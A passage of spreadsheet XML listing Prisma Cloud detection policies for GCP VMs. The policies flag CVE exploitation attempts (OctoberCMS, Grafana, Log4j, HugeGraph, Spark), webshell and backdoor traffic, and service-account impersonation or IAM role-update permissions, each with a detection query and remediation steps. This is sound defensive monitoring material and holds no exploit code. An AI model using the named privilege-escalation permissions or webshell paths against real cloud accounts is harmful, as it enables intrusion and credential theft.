      <c r="AJ2784" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2784" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2785">
      <c r="A2785" t="inlineStr"/>
      <c r="B2785" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2785" s="2" t="inlineStr"/>
      <c r="D2785" t="inlineStr"/>
      <c r="E2785" t="inlineStr"/>
      <c r="F2785" t="inlineStr"/>
      <c r="G2785" t="b">
        <v>1</v>
      </c>
      <c r="H27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5" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2785" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2785" t="inlineStr">
        <is>
          <t>Remote Code Execution (RCE) exploitation attempt on GCP VM with known exploitable vulnerability [OctoberCMS, CVE-2021-32648]</t>
        </is>
      </c>
      <c r="L2785" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M2785" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2785" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2785" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2785" t="inlineStr">
        <is>
          <t>event</t>
        </is>
      </c>
      <c r="Q2785" t="inlineStr"/>
      <c r="R2785" t="inlineStr"/>
      <c r="S2785" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2785" t="b">
        <v>0</v>
      </c>
      <c r="U2785" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2785" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2785" t="inlineStr">
        <is>
          <t>This policy identifies exploitation attempts on GCP VMs that are vulnerable to remote code execution (RCE) with exploits in the wild [OctoberCMS, CVE-2021-32648]. 
The policy is triggered because of an incident finding in the WAAS module in Prisma Cloud due to an exploitation attempt of the vulnerability on the vulnerable GCP VM. The fact that the GCP VM has a vulnerable version of OctoberCMS software installed makes it an easy target for an attacker to exploit this vulnerability. 
Immediate attention is required to remediate the OctoberCMS [CVE-2021-32648] vulnerability reported for the GCP VM.</t>
        </is>
      </c>
      <c r="X278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CVE-2021-32648
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2021-32648</t>
        </is>
      </c>
      <c r="Y2785" t="inlineStr"/>
      <c r="Z2785" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name contains all ('Attempt to exploit known vulnerabilities (CVE-2021-32648 - OctocberCMS) observed in HTTP traffic') AND with : (Vuln WHERE id IN ('CVE-2021-32648'))</t>
        </is>
      </c>
      <c r="AA2785" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2785" t="inlineStr">
        <is>
          <t>2023-10-27 07:53:39</t>
        </is>
      </c>
      <c r="AC2785" t="inlineStr"/>
      <c r="AD2785" t="b">
        <v>1</v>
      </c>
      <c r="AE2785" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2785" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG27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5" t="inlineStr">
        <is>
          <t>5c0adaf7-3e67-4a91-918a-b6544d02f0fe</t>
        </is>
      </c>
      <c r="AI2785" t="inlineStr">
        <is>
          <t>f88b81ed-6c6a-459c-8eb1-23858b42d0c1</t>
        </is>
      </c>
      <c r="AJ2785" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2785" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2786">
      <c r="A2786" t="inlineStr"/>
      <c r="B2786" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2786" s="2" t="inlineStr"/>
      <c r="D2786" t="inlineStr"/>
      <c r="E2786" t="inlineStr"/>
      <c r="F2786" t="inlineStr"/>
      <c r="G2786" t="b">
        <v>1</v>
      </c>
      <c r="H27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6" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2786" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2786" t="inlineStr">
        <is>
          <t>Potentially nefarious webshell activity detected on a publicly exposed and vulnerable GCP VM instance with risky service account impersonation permissions</t>
        </is>
      </c>
      <c r="L2786" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,MALWARE,INTERNET_EXPOSURE,INITIAL_ACCESS</t>
        </is>
      </c>
      <c r="M2786" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2786" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2786" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2786" t="inlineStr">
        <is>
          <t>misconfig_and_event</t>
        </is>
      </c>
      <c r="Q2786" t="inlineStr"/>
      <c r="R2786" t="inlineStr"/>
      <c r="S2786" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2786" t="b">
        <v>0</v>
      </c>
      <c r="U2786" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2786" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2786" t="inlineStr">
        <is>
          <t>This policy identifies GCP VM instances that are publicly exposed with critical or high vulnerabilities, risky permissions to impersonate a service account, and webshell activity.
Publicly exposed vulnerable VM instances could allow malicious actors to remotely exploit the vulnerability to get initial access to the instance. Webshell is a shell-like interface that enables a web server to be remotely accessed, often it enables threat actors to compromise web servers and launch additional attacks. An attacker with access to the privilege escalation permissions can elevate the access of the VM instance, expanding the surface of the attack and granting access to cloud resources with sensitive information.
This policy checks for the following permissions: 'iam.serviceAccounts.getAccessToken', 'iam.serviceAccounts.signBlob', 'iam.serviceAccounts.signJwt', 'iam.serviceAccounts.implicitDelegation', 'iam.serviceAccounts.getOpenIdToken', 'iam.serviceAccounts.actAs'
Immediate attention is required to investigate Webshell activity and grant only the least privileges required and remove unwanted permissions assigned to the VM instance. Remediate critical and high vulnerabilities, and restrict public exposure reported for the VM instances as soon as possible.</t>
        </is>
      </c>
      <c r="X278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86" t="inlineStr"/>
      <c r="Z2786" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name = (('(Disabled) GCP VM instance with network path from the internet (0.0.0.0/0)' and 'GCP VM instance with permissions to impersonate a service account') and ('Traffic from a suspicious IP address associated with Webshell activity' or 'Traffic to a suspicious IP address associated with Webshell activity')) AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA2786" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2786" t="inlineStr">
        <is>
          <t>2023-10-27 07:54:09</t>
        </is>
      </c>
      <c r="AC2786" t="inlineStr"/>
      <c r="AD2786" t="b">
        <v>1</v>
      </c>
      <c r="AE2786" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2786" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG27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6" t="inlineStr">
        <is>
          <t>22b1a737-e5b6-412f-9dd0-26ad7a16f2b4</t>
        </is>
      </c>
      <c r="AI2786" t="inlineStr">
        <is>
          <t>1336f7be-f383-4a35-8ec1-e228f0f0c5a0</t>
        </is>
      </c>
      <c r="AJ2786" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2786" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2787">
      <c r="A2787" t="inlineStr"/>
      <c r="B2787" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2787" s="2" t="inlineStr"/>
      <c r="D2787" t="inlineStr"/>
      <c r="E2787" t="inlineStr"/>
      <c r="F2787" t="inlineStr"/>
      <c r="G2787" t="b">
        <v>1</v>
      </c>
      <c r="H27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7" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2787" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2787" t="inlineStr">
        <is>
          <t>Authentication bypass (BAC &amp; Privilege Escalation) exploitation attempt on GCP VM with known exploitable vulnerability [Grafana Snapshot Authentication Bypass, CVE-2021-39226]</t>
        </is>
      </c>
      <c r="L2787" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M2787" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2787" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2787" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2787" t="inlineStr">
        <is>
          <t>event</t>
        </is>
      </c>
      <c r="Q2787" t="inlineStr"/>
      <c r="R2787" t="inlineStr"/>
      <c r="S2787" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2787" t="b">
        <v>0</v>
      </c>
      <c r="U2787" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2787" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2787" t="inlineStr">
        <is>
          <t>This policy identifies exploitation attempts on GCP VMs that are vulnerable to authentication bypass (Privilege Escalation) with exploits in the wild [Grafana, CVE-2021-39226]. 
The policy is triggered because of an incident finding in the WAAS module in Prisma Cloud due to an exploitation attempt of the vulnerability on the vulnerable GCP VM. The fact that the GCP VM has a vulnerable version of Grafana software installed makes it an easy target for an attacker to exploit this vulnerability. 
Immediate attention is required to remediate the Grafana Snapshot Authentication Bypass [CVE-2021-39226] vulnerability reported for the GCP VM.</t>
        </is>
      </c>
      <c r="X278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CVE-2021-39226
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2021-39226</t>
        </is>
      </c>
      <c r="Y2787" t="inlineStr"/>
      <c r="Z2787" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name contains all ('Attempt to exploit known vulnerabilities (CVE-2021-39226 - Grafana Snapshot authentication bypass) observed in HTTP traffic') AND with : (Vuln WHERE id IN ('CVE-2021-39226'))</t>
        </is>
      </c>
      <c r="AA2787" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2787" t="inlineStr">
        <is>
          <t>2023-10-27 07:53:32</t>
        </is>
      </c>
      <c r="AC2787" t="inlineStr"/>
      <c r="AD2787" t="b">
        <v>1</v>
      </c>
      <c r="AE2787" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2787" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG27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7" t="inlineStr">
        <is>
          <t>c6ec2f0f-404d-482e-a481-4cfc36e19b0a</t>
        </is>
      </c>
      <c r="AI2787" t="inlineStr">
        <is>
          <t>29de3246-eba9-4657-b00c-e5d7aaf2a170</t>
        </is>
      </c>
      <c r="AJ2787" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2787" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2788">
      <c r="A2788" t="inlineStr"/>
      <c r="B2788" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2788" s="2" t="inlineStr"/>
      <c r="D2788" t="inlineStr"/>
      <c r="E2788" t="inlineStr"/>
      <c r="F2788" t="inlineStr"/>
      <c r="G2788" t="b">
        <v>1</v>
      </c>
      <c r="H27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88" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2788" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2788" t="inlineStr">
        <is>
          <t>Remote code execution risk due to publicly exposed and vulnerable GCP VM instance (Apache Log4j, CVE-2021-44832)</t>
        </is>
      </c>
      <c r="L2788" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2788" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2788" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2788" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2788" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2788" t="inlineStr"/>
      <c r="R2788" t="inlineStr"/>
      <c r="S2788" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2788" t="b">
        <v>0</v>
      </c>
      <c r="U2788" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2788" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2788" t="inlineStr">
        <is>
          <t>This policy identifies GCP VM instance that are publicly exposed and have known exploitable Remote code execution vulnerability (CVE-2021-44832).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Log4j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Log4j (CVE-2021-44832) vulnerability and public exposure reported for the affected GCP VM instance as soon as possible.</t>
        </is>
      </c>
      <c r="X278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CVE-2021-44832
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2021-44832</t>
        </is>
      </c>
      <c r="Y2788" t="inlineStr"/>
      <c r="Z2788" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name contains all ('(Disabled) GCP VM instance with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2021-44832'))</t>
        </is>
      </c>
      <c r="AA2788" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2788" t="inlineStr">
        <is>
          <t>2024-03-05 05:47:15</t>
        </is>
      </c>
      <c r="AC2788" t="inlineStr"/>
      <c r="AD2788" t="b">
        <v>1</v>
      </c>
      <c r="AE2788" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2788" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG27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88" t="inlineStr">
        <is>
          <t>e040c33e-def0-4ae5-a806-4faab55ebc06</t>
        </is>
      </c>
      <c r="AI2788" t="inlineStr">
        <is>
          <t>42ed3d6c-f08e-488c-9b0d-71a831e95b9e</t>
        </is>
      </c>
      <c r="AJ2788" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2788" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2789">
      <c r="A2789" t="inlineStr"/>
      <c r="B2789" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2789" s="2" t="inlineStr"/>
      <c r="D2789" t="inlineStr"/>
      <c r="E2789" t="inlineStr"/>
      <c r="F2789" t="inlineStr"/>
      <c r="G2789" t="b">
        <v>1</v>
      </c>
      <c r="H27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789" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2789" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2789" t="inlineStr">
        <is>
          <t>Remote Code Execution (Unauthenticated) risk due to publicly exposed and vulnerable GCP VM (Apache HugeGraph-Server, CVE-2024-27348)</t>
        </is>
      </c>
      <c r="L2789" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2789" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2789" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2789" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2789" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2789" t="inlineStr"/>
      <c r="R2789" t="inlineStr"/>
      <c r="S2789" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2789" t="b">
        <v>0</v>
      </c>
      <c r="U2789" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2789" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2789" t="inlineStr">
        <is>
          <t>This policy identifies GCP VMs that are publicly exposed and have a known exploitable Remote Code Execution (RCE) vulnerability (CVE-2024-27348).
CVE-2024-27348 is a critical vulnerability in Apache HugeGraph-Server that allows remote code execution (RCE). This means an attacker could potentially take control of the system if it’s running a vulnerable version of the software. The vulnerability exists because the software doesn’t properly sanitize user input, which allows attackers to inject Groovy code.
The affected software versions are Apache HugeGraph-Server versions before 1.3.0. An attacker can exploit this unauthenticated RCE via Groovy injection to take control of the system. The fact that the GCP VM is publicly exposed makes it an easy target for an attacker to compromise the affected system.
Successful exploitation of the Remote Code Execution vulnerability on the publicly exposed GCP VM would allow an attacker to gain full control of the host and further move laterally to compromise other resources. This could lead to monetary loss, damage to reputation, and other compliance risks to the organization.
Immediate attention is required to remediate the Apache HugeGraph-Server (CVE-2024-27348) vulnerability and public exposure reported for the affected GCP VM as soon as possible.</t>
        </is>
      </c>
      <c r="X2789" t="inlineStr">
        <is>
          <t>[Internet Exposure]
Restrict Internet exposure of reported VM instance based on your business requirement by modifying VPC firewall rules to the trusted IP address,
To modify VPC firewall rules,
1. Login to GCP Console
2. Go to 'VM instance'
3. Identify the VM instance that you want to restrict access to Internet
4. Update VPC firewall rule that allow Internet access (0.0.0.0/0)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VPC firewall group rules, make sure that you don't lock yourself out of the instances. Always have a rule that allows you to access them for management purposes.
[Vulnerability]
To patch or update the vulnerable software refer to https://nvd.nist.gov/vuln/detail/CVE-2024-27348</t>
        </is>
      </c>
      <c r="Y2789" t="inlineStr"/>
      <c r="Z2789" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name contains all ('(Disabled) GCP VM instance with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2024-27348'))</t>
        </is>
      </c>
      <c r="AA2789" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2789" t="inlineStr">
        <is>
          <t>2024-07-08 06:43:46</t>
        </is>
      </c>
      <c r="AC2789" t="inlineStr"/>
      <c r="AD2789" t="b">
        <v>1</v>
      </c>
      <c r="AE2789" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2789" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG27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89" t="inlineStr">
        <is>
          <t>50e7cbd2-dec2-4215-b64a-bcef2ce3c3d9</t>
        </is>
      </c>
      <c r="AI2789" t="inlineStr">
        <is>
          <t>357019af-146c-495c-b1d9-f9e6d13d8fed</t>
        </is>
      </c>
      <c r="AJ2789" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2789" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2790">
      <c r="A2790" t="inlineStr"/>
      <c r="B2790" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2790" s="2" t="inlineStr"/>
      <c r="D2790" t="inlineStr"/>
      <c r="E2790" t="inlineStr"/>
      <c r="F2790" t="inlineStr"/>
      <c r="G2790" t="b">
        <v>1</v>
      </c>
      <c r="H27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0" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2790" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2790" t="inlineStr">
        <is>
          <t>Command injection risk due to publicly exposed and vulnerable GCP VM instance (Apache Spark, CVE-2022-33891)</t>
        </is>
      </c>
      <c r="L2790" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2790" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2790" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2790" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2790" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2790" t="inlineStr"/>
      <c r="R2790" t="inlineStr"/>
      <c r="S2790" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2790" t="b">
        <v>0</v>
      </c>
      <c r="U2790" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2790" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2790" t="inlineStr">
        <is>
          <t>This policy identifies GCP VM instance that are publicly exposed and have known exploitable Command injection vulnerability (CVE-2022-33891).
Command injection vulnerability would allow an attacker to inject arbitrary commands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Spark Command injection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Spark (CVE-2022-33891) vulnerability and public exposure reported for the affected GCP VM instance as soon as possible.</t>
        </is>
      </c>
      <c r="X279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CVE-2022-33891
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2022-33891</t>
        </is>
      </c>
      <c r="Y2790" t="inlineStr"/>
      <c r="Z2790" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name contains all ('(Disabled) GCP VM instance with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2022-33891'))</t>
        </is>
      </c>
      <c r="AA2790" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2790" t="inlineStr">
        <is>
          <t>2024-03-05 05:47:18</t>
        </is>
      </c>
      <c r="AC2790" t="inlineStr"/>
      <c r="AD2790" t="b">
        <v>1</v>
      </c>
      <c r="AE2790" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2790" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG27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0" t="inlineStr">
        <is>
          <t>61cc0405-37a9-4077-99e7-af403b6889dc</t>
        </is>
      </c>
      <c r="AI2790" t="inlineStr">
        <is>
          <t>cb0eed7d-fa61-4792-b2eb-f6b292051ffe</t>
        </is>
      </c>
      <c r="AJ2790" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2790" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2791">
      <c r="A2791" t="inlineStr"/>
      <c r="B2791" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2791" s="2" t="inlineStr"/>
      <c r="D2791" t="inlineStr"/>
      <c r="E2791" t="inlineStr"/>
      <c r="F2791" t="inlineStr"/>
      <c r="G2791" t="b">
        <v>1</v>
      </c>
      <c r="H27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91" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2791" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2791" t="inlineStr">
        <is>
          <t>Privilege escalation risk due to a publicly exposed and vulnerable GCP VM instance with IAM Role update permissions</t>
        </is>
      </c>
      <c r="L2791" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2791" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2791" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2791" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2791" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2791" t="inlineStr"/>
      <c r="R2791" t="inlineStr"/>
      <c r="S2791" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2791" t="b">
        <v>0</v>
      </c>
      <c r="U2791" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2791" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2791" t="inlineStr">
        <is>
          <t>This policy identifies GCP VM instances that are publicly exposed with critical or high vulnerabilities and have IAM Role update permissions.
A publicly exposed and vulnerable GCP VM instance could allow malicious actors to remotely exploit the vulnerability to get initial access to the instance. The risky IAM Role update permissions further helps attackers escalate their privileges and perform unauthorised actions in the cloud account.
This policy checks for the following IAM Role permissions:
'iam.roles.update','iam.roles.get'.
Immediate attention is required to grant the least privileges and remove unwanted risky permissions assigned to the VM instance, remediate critical and high vulnerabilities, and restrict public exposure reported for the VM instances as soon as possible.</t>
        </is>
      </c>
      <c r="X2791"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791" t="inlineStr"/>
      <c r="Z2791" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name contains all ('(Disabled) GCP VM instance with network path from the internet (0.0.0.0/0)','GCP Compute Instance (VM/Cloud Function) Assigned IAM Role Update Permissions Which Could Lead to Privilege Escalation') AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA2791" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2791" t="inlineStr">
        <is>
          <t>2024-09-16 06:33:15</t>
        </is>
      </c>
      <c r="AC2791" t="inlineStr"/>
      <c r="AD2791" t="b">
        <v>1</v>
      </c>
      <c r="AE2791" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2791" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG27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91" t="inlineStr">
        <is>
          <t>bacf6e9b-f908-457b-bc80-2cf2b6c1c939</t>
        </is>
      </c>
      <c r="AI2791" t="inlineStr">
        <is>
          <t>8536fe73-4a94-4989-996a-3995424bdc23</t>
        </is>
      </c>
      <c r="AJ2791" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2791" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2792">
      <c r="A2792" t="inlineStr"/>
      <c r="B2792" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2792" s="2" t="inlineStr"/>
      <c r="D2792" t="inlineStr"/>
      <c r="E2792" t="inlineStr"/>
      <c r="F2792" t="inlineStr"/>
      <c r="G2792" t="b">
        <v>1</v>
      </c>
      <c r="H27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2" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2792" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2792" t="inlineStr">
        <is>
          <t>Potentially nefarious backdoor activity detected on a publicly exposed and vulnerable GCP VM instance</t>
        </is>
      </c>
      <c r="L2792" t="inlineStr">
        <is>
          <t>MALWARE,INTERNET_EXPOSURE,INITIAL_ACCESS</t>
        </is>
      </c>
      <c r="M2792" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2792" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2792" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2792" t="inlineStr">
        <is>
          <t>misconfig_and_event</t>
        </is>
      </c>
      <c r="Q2792" t="inlineStr"/>
      <c r="R2792" t="inlineStr"/>
      <c r="S2792" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2792" t="b">
        <v>0</v>
      </c>
      <c r="U2792" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2792" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2792" t="inlineStr">
        <is>
          <t>This policy identifies GCP VM instances that are publicly exposed with critical or high vulnerabilities and are connected to remote systems known for backdoor activities.
A backdoor allows unauthorized remote access to the instances where the malware is installed while bypassing the authentication mechanisms in place. If network connectivity with remote systems known for backdoor activity is observed on a publicly exposed and exploitable GCP VM instance, it could indicate that the instance is already under attack or has been compromised.
Immediate attention is required to investigate backdoor activity, remediate critical and high vulnerabilities, and restrict public exposure reported for the GCP VM instances as soon as possible.</t>
        </is>
      </c>
      <c r="X2792"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792" t="inlineStr"/>
      <c r="Z2792" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name = (('(Disabled) GCP VM instance with network path from the internet (0.0.0.0/0)') and ('Traffic to a suspicious IP address associated with Backdoor activity' or 'Traffic from a suspicious IP address associated with Backdoor activity')) AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA2792" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2792" t="inlineStr">
        <is>
          <t>2023-10-27 07:54:09</t>
        </is>
      </c>
